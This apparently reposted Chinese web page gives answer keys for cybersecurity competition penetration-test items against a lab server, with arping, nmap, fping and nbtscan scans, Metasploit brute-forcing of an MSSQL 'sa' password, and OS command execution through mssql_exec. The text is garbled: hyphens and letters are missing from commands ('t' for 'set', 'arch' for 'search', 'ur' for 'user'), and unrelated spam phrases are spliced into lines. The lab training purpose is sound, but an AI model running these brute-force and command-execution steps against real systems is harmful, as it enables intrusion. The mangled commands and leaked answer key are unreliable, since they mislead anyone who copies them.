网络空间安全竞赛单兵渗透试题解析

更新时间:2023-07-04 15:38:15 阅读: 评论:0

ARP扫描渗透测试
1.1 1.通过本地PC中渗透测试平台BT5对服务器场景rv2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令的参数字符串作为Flag提交;(16分)
完整操作    arping –c  5  192.168.X.X
答案flag        -c
1.2通过本地PC中渗透测试平台BT5对服务器场景rv2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;(17分)
苦瓜瘦肉汤完整操作    arping –c  5  192.168.X.X
答案flag        5
1.3通过本地PC中渗透测试平台BT5对服务器场景rv2003行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;(16分)
你在我身边完整操作    msfconsole ; arch arp_sweep ;
答案flag        auxiliary/scanner/discovery/arp_sweep
1.4通过本地PC中渗透测试平台BT5对服务器场景rv2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景rv2003在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;(17分)
完整操作u auxiliary/scanner/discovery/arp_sweep; show options; t rhosts ;run/exploit
养老保险退保答案flag  completed
1.5通过本地PC中渗透测试平台BT5对服务器场景rv2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景rv2003在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;(16分)
完整操作
答案flag  appears(呈现-开机)  invalid(不能识别-关机)
1.6连锁加盟排行榜通过本地PC中渗透测试平台BT5对服务器场景rv2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景rv2003在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交。(18分)
完整操作
答案flag run或者exploit
MSSQL数据库渗透测试(100分)
2.1在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景rv2003所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。并将该操作使用的命令中必须要使用的字符串作为FLAG提交;(10分)
完整操作 zenmap; 目标192.168.1.100/24;命令nmap -p 1433,3306,80 -T4 -A -v 192.168.1.100/24
答案flag    -p 1433,3306,80
2.2通过本地PC中渗透测试平台BT5对服务器场景rv2003进行系统服务及版本扫描渗透测试,并将该操作显示结果中mssql数据库服务对应的服务端口信息作为FLAG提交;(10分)
完整操作    nmap -sV 192.168.1.100
答案flag        1433/tcp
2.3在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用arch命令,并将扫描
弱口令模块的名称作为FLAG提交;(10分)
完整操作    msfconsole;arch mssql_login;
答案flag        mssql_login
冷链仓储
2.4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);(10分)
完整操作    show options
答案flag        RHOSTS,PASS_FILE,THREADS,USERNAME
2.5在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;(10分)
完整操作  t RHOSTS 192.168.X.X
答案flag        t RHOSTS
2.6登陆靶机共享,将共享文件夹password里的下载到攻击机BT5本地,在msf模块中指定密码字典,字典路径为/爆破获取密码并将得到的密码作为FLAG提交;(14分)风祝
完整操作
我们这里做的时候先自己创建字典文件,再爆破。
            先用vim  /创建用户名字典  输入常见用户名,admin,administrator,root,toor,sa(每个单词占一行);再vim  /创建密码字典,输入常见密码,1234,tbb,tbb123,88888,999999,123456(注意字典中必须有一个用户名和密码是正确的,才能爆破)
msf5 auxiliary(scanner/mssql/mssql_login) > t ur_file  /
ur_file => /
msf5 auxiliary(scanner/mssql/mssql_login) > t pass_file /
pass_file => /
msf5 auxiliary(scanner/mssql/mssql_login) > run
仔细看结果Login Successful:为成功的进入
[-] 192.168.1.7:1433      - 192.168.1.7:1433 - LOGIN FAILED: WORKSTATION\sa:tbb8342tbb (Incorrect: )
[+] 192.168.1.7:1433      - 192.168.1.7:1433 - Login Successful: WORKSTATION\sa:123456
[-] 192.168.1.7:1433      - 192.168.1.7:1433 - LOGIN FAILED: WORKSTATION\toor:tbb (Incorrect: )
答案flag        123456
2.7在msf模块中切换新的渗透模块,对服务器场景rv2003进行数据库服务扩展存储过程进行利用,将调用该模块的命令作为FLAG提交;(14分)
完整操作  arsh  mssql_exec
答案flag        u auxiliary/admin/mssql/mssql_exec
2.8在上一题的基础上,使用第6题获取到的密码并进行提权,同时使用show options命令查看需要的配置,并配置CMD参数来查看系统用户,将配置CMD参数的命令作为FLAG提交;(14分)
完整操作
msf5 auxiliary(scanner/mssql/mssql_login) > u auxiliary/admin/mssql/mssql_exec
msf5 auxiliary(admin/mssql/mssql_exec) > show options
msf5 auxiliary(admin/mssql/mssql_exec) > t PASSWORD 123456
PASSWORD => 123456
msf5 auxiliary(admin/mssql/mssql_exec) > t /c net ur
答案flag        t /c net ur
2.9在利用msf模块获取系统权限并查看目标系统的异常(黑客)用户,并将该用户作为FLAG提交。(8分)
完整操作 接上题操作t /c 'md c:\aaaa111';run;可在目标机C盘建立文件夹(通过sql漏洞提权,可执行一切操作,可怕)
答案flag        Hacker
主机发现与信息收集
3.1通过本地PC中渗透测试平台BT5使用fping对服务器场景rv2003所在网段(例如:172.16.101.0/24)进行主机发现扫描,并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)
完整操作  fping g
答案flag    -g
3.2通过本地PC中渗透测试平台BT5使用genlist对服务器场景rv2003所在网段进行扫描进行主机存活发现, 并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)
完整操作    genlist -s 192.168.1.*
碗碗羊肉答案flag    剪纸图-s
3.3在通过本地PC中渗透测试平台BT5使用nbtscan对服务器场景rv2003所在网段进搜索扫描,获取目标的MAC地址等信息,并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)
完整操作
完整操作    nbtscan r  192.168.15.1/24
答案flag    -r
3.4假设服务器场景rv2003设置了防火墙无法进行ping检测,通过PC中渗透测试平台BT5使用arping检测主机连通性扫描(发送请求数据包数量为 4个),并将该操作使用的命令中固定不变的字符串作为FLAG提交;(12分)
完整操作    arping c 4 192.168.15.110
答案flag    arping -c 4
3.5通过本地PC中渗透测试平台BT5使用fping对服务器场景rv2003所在网段进行存活性扫描,且要把最终扫描的存活主机输出到文件ip.txt中,并将该操作使用的命令中必须要使用的参数作为FLAG提交(各参数之间用英文逗号分割,注意题目要求的先后顺序,例a,b);(12分)
完整操作  fping 192.168.15.110 g a
答案flag    -g,-a
3.6通过本地PC中渗透测试平台BT5使用nbtscan从第5题的ip.txt文件中读取IP扫描主机信
息MAC地址等信息,并将该操作使用的命令中固定不变的字符串作为FLAG提交;(12分)

本文发布于:2023-07-04 15:38:15,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/fan/89/1067616.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:使用   作为   进行   扫描   测试   渗透   模块
相关文章
留言与评论(共有 0 条评论)
   
验证码:
推荐文章
排行榜
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图